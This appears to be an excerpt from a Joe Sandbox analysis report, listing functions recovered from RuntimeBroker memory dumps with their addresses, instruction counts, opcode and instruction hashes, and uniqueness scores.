Opcode Fuzzy Hash: 079fe5840702cd06c6580fd08629126d46ea0cbec6f96fac567fb1898053adb6
Instruction Fuzzy Hash: FE113C2184E6C68EEB63B77858655617F944F03264F2D46FBF0D8CA0E3DB0D5899C316

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F43109 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a0d426e6dbd7c328ae658f38cb2093279757abe4ab619095e86f4c6967b75f
Instruction ID: a28a3f02454c1265870e2297b073f5c803819c6859fedb610449105a8aa9cacb
Opcode Fuzzy Hash: 61a0d426e6dbd7c328ae658f38cb2093279757abe4ab619095e86f4c6967b75f
Instruction Fuzzy Hash: 1A21B730C0D68A9FE742E7688859AAA7FF0FF6A350F0405FBD449C71A2DA285544C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F423E1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e5170dae90a06ed8baadd1fba88be4b36a3a9c748f25b0bf1cda44b7cca4673
Instruction ID: 5f5b98ef41ba068066f0c811adbdca7bd6948f0e126057fbf8818be6ba395dc4
Opcode Fuzzy Hash: 3e5170dae90a06ed8baadd1fba88be4b36a3a9c748f25b0bf1cda44b7cca4673
Instruction Fuzzy Hash: 9011A9709086498FDB48EF18C4961E97BE0FF68740F0102BFE80AD32A2DB38A550CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44675 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df7968919ca4c9f39dfc649007992e6d01da2e7c5889b54b08d2cd8ab16d4e7
Instruction ID: ea6d4b6b6ceec33d4b52dbe33f4bb811d2b1129bc186f0da47184177aed4a32b
Opcode Fuzzy Hash: 7df7968919ca4c9f39dfc649007992e6d01da2e7c5889b54b08d2cd8ab16d4e7
Instruction Fuzzy Hash: 0C11603090E64E9FDB89EF6884592B9BBA1FF68345F1405BFD409E25D5DB346440C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F445D9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8d2566dcd2eb2b39ffd60d5141ebd3781a15031349528127aee15b21a65f4e
Instruction ID: 0a4611567c72818e76bb5e6c9de4d85343b6f825ed6aa80b8b6e55e41850814a
Opcode Fuzzy Hash: ff8d2566dcd2eb2b39ffd60d5141ebd3781a15031349528127aee15b21a65f4e
Instruction Fuzzy Hash: 1E21813080D6899FEB85EF28C4592BDBBA0FF69345F0405BBD419D71D2DB386440CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a790fc7ea2d9c23eec0ac9e976fcaabeb4bf0549ac72a262b469162315f9363
Instruction ID: c99c65caa88a8329561f9517d28bc3d7e2b57701f13e9f2c7d32719ebb1d6253
Opcode Fuzzy Hash: 6a790fc7ea2d9c23eec0ac9e976fcaabeb4bf0549ac72a262b469162315f9363
Instruction Fuzzy Hash: 4901C031E0C68E9EE752FB7888895A97BE0EF95340F2504B3D849C6092EA24A445C695

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F425EB Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24123ae4c23027a305a3b12dff01767b14ea76c290cf720fa38a6f2f7ca45354
Instruction ID: d5b52f56612522f9e39c2c482d777f7fd01718496a9abea431602f5ce11c5684
Opcode Fuzzy Hash: 24123ae4c23027a305a3b12dff01767b14ea76c290cf720fa38a6f2f7ca45354
Instruction Fuzzy Hash: 2F11DD3084D7894FDB5AAB6088292F97BA0FF26302F0500BBD80AC71E2EB386581C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44B15 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e87115128630141b8c4e1fffae45f6ce84da13d0b01834e54f3d0e86afaf6209
Instruction ID: 57d2c4eebad5c27121aac636b27b08180753bdb584e474c4d5b4bdf1eb487e41
Opcode Fuzzy Hash: e87115128630141b8c4e1fffae45f6ce84da13d0b01834e54f3d0e86afaf6209
Instruction Fuzzy Hash: CC11C431C0EA898FE799EB6488692B87BA0FF75745F0400BFC00DE65D2DB296448C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BE4D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction ID: df4901377f8ebb8e4a808742a5cdb213fc60443cd7d9b404a858c888c3da128c
Opcode Fuzzy Hash: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction Fuzzy Hash: 5521A371D1960A8FDB58EF99D4A46EDBBB1BF18351F20003AE419A72D1CB386990CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47441 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f47000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd3049f5b496980108656e60f4594d4ff7a6c3f23619d9c498c32c407d0ffa87
Instruction ID: 2ff19752bd6f616b9957fa01b72ff588e678eb0d029601cab2cb748572e10017
Opcode Fuzzy Hash: bd3049f5b496980108656e60f4594d4ff7a6c3f23619d9c498c32c407d0ffa87
Instruction Fuzzy Hash: 2E115A3090D94E9FEB51FBB888486B9BFE4FF29741F0404B7D408D70A2EB38A5908B55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6af828333259ce2d011f87e3ed9ba9c068e21e80b1cff0fa10f136df40c1ab5
Instruction ID: 6e9c075e55851a5e90af4ae9e35b93972f62bcf917e18cdb4d369d89f5eb8041
Opcode Fuzzy Hash: f6af828333259ce2d011f87e3ed9ba9c068e21e80b1cff0fa10f136df40c1ab5
Instruction Fuzzy Hash: 7D114F7190D58B8FEB99EB28E5196B977A0FF19345F0408BED00ED25D2DF3964018714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44F29 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60182809a5800315b1131fee6f476894588e2b556e3f084a2cfef8770b29cdae
Instruction ID: 7cd9670692ec297daef8323ac6ddc77467d9eabc5e0786898465ac5e1fcc7a32
Opcode Fuzzy Hash: 60182809a5800315b1131fee6f476894588e2b556e3f084a2cfef8770b29cdae
Instruction Fuzzy Hash: F7119D30C0E68A8FEB85EB2488692B97BF0FF29315F0404BBC409E71D2EB386444C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F427D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685efda2bb0e56ead0ba5a0c3a644059b59c85d056a18256031ba795251a2fbf
Instruction ID: 20bba640257309ef2baabb9b01affcec2ad7c1c89af45dee393bd04318682849
Opcode Fuzzy Hash: 685efda2bb0e56ead0ba5a0c3a644059b59c85d056a18256031ba795251a2fbf
Instruction Fuzzy Hash: B4115E3090D55A9EE742BBA888585F97BE0FF29341F1448B7D408D7096EB349144C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44C3D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e58a468e4f0998403f19f171568d107c1144dbc3d7b60bc1e3562ca68ed2f0d
Instruction ID: 7dcbda90e941f8a51c02c893da032d3606d2edd7f5ce9b5da49b1404d00f33f9
Opcode Fuzzy Hash: 3e58a468e4f0998403f19f171568d107c1144dbc3d7b60bc1e3562ca68ed2f0d
Instruction Fuzzy Hash: 6D11BF3080E68A9FEB88EB6484592BEBBF0FF28305F0804BBC409E71D2DB35A440C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F334F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 266770d4157536f4d1bca3ca0b34f826be9bc17394ffca0440aaf4479e987e0e
Instruction ID: 2fc6d42856c4b33d4400f2530f7fda4419118314598fea78c3a4d478d7fe4276
Opcode Fuzzy Hash: 266770d4157536f4d1bca3ca0b34f826be9bc17394ffca0440aaf4479e987e0e
Instruction Fuzzy Hash: DB11577091868E8FEB99EF6898596BE7BA0FF18301F4409BFD41AC61D2EB35A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F44E9D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1020f12b922b77a742cacc022a58bd54f521ebbb8608f7f1a63d11e9983aef
Instruction ID: 2c4bf7f4eeb1951a0d9d83a9810037902252fe9ec6bac6efa74db2d5a679cc71
Opcode Fuzzy Hash: fd1020f12b922b77a742cacc022a58bd54f521ebbb8608f7f1a63d11e9983aef
Instruction Fuzzy Hash: 71119E3090EA8A8FEB49EB2484696BD7BE0FF28355F0405BBD419E65D2DB39A580C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506c031c2d4a518fc7ef65db785979f59baaf974452a1daced600b9d7436fdf2
Instruction ID: dd5321a281c3ac80361c67192daa6a3b05449f6c4381d525cb35bb42a1a75648
Opcode Fuzzy Hash: 506c031c2d4a518fc7ef65db785979f59baaf974452a1daced600b9d7436fdf2
Instruction Fuzzy Hash: E7113930919A8E8FEB85EF6888692BDBBE0FF18341F4004BBD41AC61D2DF75A540C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd50c2d7426bc6ad75b9c622209697333bdbde14105088c375e1161d87f4a601
Instruction ID: 46729d5223554c0bd981ae4357964a1022507cc6b933d757906cfc9921d209fc
Opcode Fuzzy Hash: fd50c2d7426bc6ad75b9c622209697333bdbde14105088c375e1161d87f4a601
Instruction Fuzzy Hash: 86017831D0D68E9FE751FB68884A6A97BE0EF59342F0508B7D80CC61E2EB38E4848704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6214793a28126d28474792507354dc5be763ff58161a94f70543dbf4505f41
Instruction ID: 1c9c6b660605f6752c29925f6b6ec4b2fa5218c9d4f79e300ff7cb9450e7d000
Opcode Fuzzy Hash: da6214793a28126d28474792507354dc5be763ff58161a94f70543dbf4505f41
Instruction Fuzzy Hash: D3014C3090950E8FEB49EF24C4596FAB7A1FF58385F50457AE40EC21D1DF35A5A1CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f47000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cf0d00814a69dd02777e52577909c3fc04684750ccae526c9c8370962202a5
Instruction ID: c3a27fc7fc4a38b55ba7ad11c45eb052bb0c51e7a2866f27a11d11561e5cfcaa
Opcode Fuzzy Hash: 74cf0d00814a69dd02777e52577909c3fc04684750ccae526c9c8370962202a5
Instruction Fuzzy Hash: 63015A3086DA8D8FDB49EB24C8696B97BA0EF29341F0504BFD40AD61D2DF6AA550C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f41000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3abc1f942119097641419755e575ecd7a16518f1a5e08735d1449a3a2d7b0dbb
Instruction ID: 9345ce5d6cb0950bcdc16c78994d465c84e1af4e53c8276958fc9d6ce13a9233
Opcode Fuzzy Hash: 3abc1f942119097641419755e575ecd7a16518f1a5e08735d1449a3a2d7b0dbb
Instruction Fuzzy Hash: CE01D43085D6498FEB49EF74C4586BA7BA0FF29300F0104BBD41AD60D2DF35A654CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4bdc665adfb13858fc24da7b76ede21a255a79eb1a45c08fe3d973b2fd04e0
Instruction ID: 1c4ccfaa58656c3748b478608dcde3c08716ff8e4a1c22d7bf0b30d9f64bd852
Opcode Fuzzy Hash: 2a4bdc665adfb13858fc24da7b76ede21a255a79eb1a45c08fe3d973b2fd04e0
Instruction Fuzzy Hash: 4C018B3085D64E9FE795FB6884886B97BE0FF59342F5504B7D408C70A2EB38E0408704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f47000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486277b8e3d0baa47188ebd847cd32994f064ec12c647dfa65cb68edcb8c1663
Instruction ID: d7a94b6b49fc31feee72775d46e43b5be3b61b986decd3e7d2e74dcc0bf96e77
Opcode Fuzzy Hash: 486277b8e3d0baa47188ebd847cd32994f064ec12c647dfa65cb68edcb8c1663
Instruction Fuzzy Hash: 65019E3091DA8D8FDB4AEB34C4692B97BA0FF29340F4404BBD40AD61D2DF26A450C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3AB15 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90556f8b016f8dd4cf23dd9667f08a8df8c4d25eb578822f10b120b0e80eece9
Instruction ID: dbabe12bacc3c89dd6d965755f76abe3c82923751c71e147040b32af2524ce8d
Opcode Fuzzy Hash: 90556f8b016f8dd4cf23dd9667f08a8df8c4d25eb578822f10b120b0e80eece9
Instruction Fuzzy Hash: 98F0283370E3924FC312AB2EBCA21EA3B34DF921A5B0942B3C084CA1D3DB1D900A4795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ed95bd33b3a36ef75d9447d5aacc5ef67bf19cc4d7a1ff397508423117af2b
Instruction ID: 0aab06960ecf77e6019811eed53df505c651e1856fc102b1245d61f21c80c88a
Opcode Fuzzy Hash: 59ed95bd33b3a36ef75d9447d5aacc5ef67bf19cc4d7a1ff397508423117af2b
Instruction Fuzzy Hash: 8E018F31D1D6898FE742BB7488592A97FE0EF5A342F0604F7D808CB0E6EB38A4448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F475C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f47000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6736d4a28462f6b17538229135ac64877ba144c46c5cf63c2b12cbd3857487b
Instruction ID: d1976f106052d25680f80dba711076704ba520fe59e16abf0c280e268da0d142
Opcode Fuzzy Hash: c6736d4a28462f6b17538229135ac64877ba144c46c5cf63c2b12cbd3857487b
Instruction Fuzzy Hash: E9017C7084EA8E5FE742FB3888591A97BE1EF29350F0548B3D408CB0E2EB28A4448701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da11c46b978232479aa922c2e4d6e89e84417c4614950af28e4803409c2afc1
Instruction ID: df076596ad3f87428faec7ce7d98656682839d74adaa5d0da914003bdc208cc5
Opcode Fuzzy Hash: 9da11c46b978232479aa922c2e4d6e89e84417c4614950af28e4803409c2afc1
Instruction Fuzzy Hash: 2D018F3194DA899FEB52FB7489595A97BE0EF19380F0509F3D408CB0A2EB38A484C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c74c738ecf7367348dac52073ec58c16d11ad66e391527ecf2e82c959b178af
Instruction ID: 4794d25c5a6681d3fa2bbd6eff45ae0c374001bef69d1c13adc32b2584e060e3
Opcode Fuzzy Hash: 8c74c738ecf7367348dac52073ec58c16d11ad66e391527ecf2e82c959b178af
Instruction Fuzzy Hash: 7601693091860E9EEB59FBA884586BE76A1FF18346F50087EE40EC21D1DF35A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ab27f5642cbee8c6fb1c280af0755712d40a1ebba966ab6d07f02b40eb2091
Instruction ID: 6219f8e478f7288b5a6a387aeba465da587462ac9d0f57943ec33611ad17cc31
Opcode Fuzzy Hash: 29ab27f5642cbee8c6fb1c280af0755712d40a1ebba966ab6d07f02b40eb2091
Instruction Fuzzy Hash: 1C016930919A0E9FEB59EB6484592B9B7E0FF18346F20487FE40EC21D1DF39A550C614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F31BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb2c88744ca614cbcfa84712899ed73f86aedc375580a5188e613f75f4fc0db
Instruction ID: 9d92ffd845466564e9df55d1015602f1ccc055249ae4c20265ad4a7d188c22df
Opcode Fuzzy Hash: efb2c88744ca614cbcfa84712899ed73f86aedc375580a5188e613f75f4fc0db
Instruction Fuzzy Hash: 1101A97080D68E8FEB99EF2484592BA7BA0FF55341F4400BAE808C21D2DB359490CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f3a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: f2ced088bb4b8455868c33316bc232a012c51a293a437404177c0b8834d5319c
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 4901C871D0960ACFDB18EF85D4A06EDB7B1EF48361F24002ED51AA32D0CB386991CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3e78de93a49f9dbfec705544cf21b5478c36ab370c37e7bac5aecd7fa7258f
Instruction ID: d825a827078a7b82fee697043566e1482f86e00a3aafb1df26aaa5d98bf915dc
Opcode Fuzzy Hash: 9e3e78de93a49f9dbfec705544cf21b5478c36ab370c37e7bac5aecd7fa7258f
Instruction Fuzzy Hash: 43F0CD3080E64E8FEB89EF2494052FA77A4FF15389F10053AF80DC21C1DB39A5A0CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F32759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c24f6404a8ca3c8eb6fbac3f3988caf943678a1b99fa2aa0d0c0f6ec30d34b4
Instruction ID: 3c3b91b5d70c87b774a4242221fedb4749714ea97a6e6f04367e90ad2d833580
Opcode Fuzzy Hash: 7c24f6404a8ca3c8eb6fbac3f3988caf943678a1b99fa2aa0d0c0f6ec30d34b4
Instruction Fuzzy Hash: F0F0623180E78A8FEB5AAF6488592A93BA1FF16342F4505BBD409C61D2DB38A454C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F47AB3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F47000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F47000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f47000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f2b993270a80f7705a2855a0f6b178782dfc772479bfa5278e2edfafd5f018
Instruction ID: cc4efff156482da801fc066d0c473656ddf4775651c0fa60e3b41f5b1b2cc0ad
Opcode Fuzzy Hash: 33f2b993270a80f7705a2855a0f6b178782dfc772479bfa5278e2edfafd5f018
Instruction Fuzzy Hash: 3EF03A31E0851D9BDB18EB98E8918FDB7B5FFA8640F50013AD109B3286CF246A058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F327CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2207193961.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ff848f30000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc72848ab4593ab206cce85c48b54c05b21f50b94efdaa6540eee21d1ca22e4
Instruction ID: 644eb476d63020a6b26b62358cfe7543733b70233512bca883901d877207208d
Opcode Fuzzy Hash: 6bc72848ab4593ab206cce85c48b54c05b21f50b94efdaa6540eee21d1ca22e4
Instruction Fuzzy Hash: 5EF0BE7080E78E8FEB59AF6488292B97BA0FF15346F4505BFE809C60D2EB399454C741

